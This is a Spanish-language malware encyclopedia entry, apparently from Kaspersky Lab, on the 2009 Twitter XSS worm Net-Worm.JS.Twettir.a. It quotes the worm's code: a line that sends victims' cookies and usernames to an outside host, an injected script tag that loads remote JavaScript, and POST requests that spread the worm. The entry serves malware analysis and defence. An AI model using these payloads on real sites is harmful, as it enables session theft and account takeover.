RSS | Foro | Encuestas | Mapa de nuestro sitio




Todas las amenazas

Virus

Hackers

Spam
Todo el sitio    Sólo virus
  
Enciclopedia de virus
Alertas
Análisis
Noticias
Glosario


El entorno de los programas maliciosos
Descripciones de los programas maliciosos
Los creadores de programas maliciosos
Historia de los programas maliciosos
Tendencias
Si su ordenador está infectado

 
Sobre hackers
About Hackers

Más información sobre hackers y vulnerabilidados en nuestra sección sobre hackers y vulnerabilidades.
Sobre spam
Sobre spam

Lea más sobre el spam y los spammers en nuestra sección sobre spam.

 		 

  Home / Virus / Enciclopedia de virus

Net-Worm.JS.Twettir.a

Otras versiones: .b, .c, .d, .e, .f, .g, .h

Detección agregada 13 abr 2009
Actualización lanzada 14 abr 2009 06:39 GMT
Descripción agregada 22 abr 2009
Detalles técnicos

Familia de gusanos XSS que se difundieron en la red social Twitter durante abril de 2009. Para reproducirse, usan vulnerabilidades XSS. Su autor es el norteamericano Michael “Mikeyy" Mooney, de 17 años.

El gusano utilizaba las vulnerabilidades en el software de Twitter que permitían realizar ataques del tipo “scripting entre sitios” (XSS) y modificar las páginas de las cuentas de los usuarios. El contagio se realizaba al visitar una página modificada en el sitio Twitter o al seguir un enlace contenido en un mensaje falso enviado en nombre de un usuario de Twitter. En estas situaciones se usaba un escenario malicioso JavaScript.

Las principales funciones del gusano son tres:

  • XHConn – que usa la función estándar XMLHttpRequest() de llamadas ajax;
  • Urlencode – que usa la función estándar encodeURIComponent() para codificar URL;
  • Wait – que es la que contiene las funciones maliciosasas.

Net-Worm.JS.Twettir.a usa la vulnerabilidad XSS durante el procesamiento de la etiqueta img:

document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'/>");

En el script x.php se transmiten los parámetros cookies y el nombre del usuario actual.

Después de que usuario atacado sigue el enlace malicioso, el gusano empieza a enviar los siguientes mensajes desde su cuenta en Twitte (que también contienen el enlace malicioso):

Dude, www.StalkDaily.com is awesome. What's the fuss?"
Join www.StalkDaily.com everyone!"
Woooo, www.StalkDaily.com :)"
Virus!? What? www.StalkDaily.com is legit!"
Wow...www.StalkDaily.com"
"@twitter www. StalkDaily.com"

Además, de entre los datos de los mensajes se escoge uno al azar para mostrarlo en el perfil del usuario infectado.

He aquí la parte del código del gusano donde se modifican los parámetros del usuario mediante solicitudes POST:

var xss = urlencode('http://www.stalkdaily.com"> <script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST",
"authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
var ajaxConn1 = new XHConn();
ajaxConn1.connect("/account/settings", "POST",
"authenticity_token="+authtoken+"&user[url]="+ xss+"&tab=home&update=update");

En la última llamada POST, mediante el cambio del parámetro userur[url] en la página del usuario se pone un enlace al script malicioso.

De esta manera, todos los usuarios que visiten la página de otro usuario infectado con este script, inician la ejecución del gusano en su propio equipo. A su vez, esto provoca un nuevo envío masivo de mensajes en su nombre y a que el script malicioso se agregue a sus páginas.

 

Copyright © 1996 - 2009
Kaspersky Lab
Todos los derechos reservados

Correo electrónico: webmaster@viruslist.com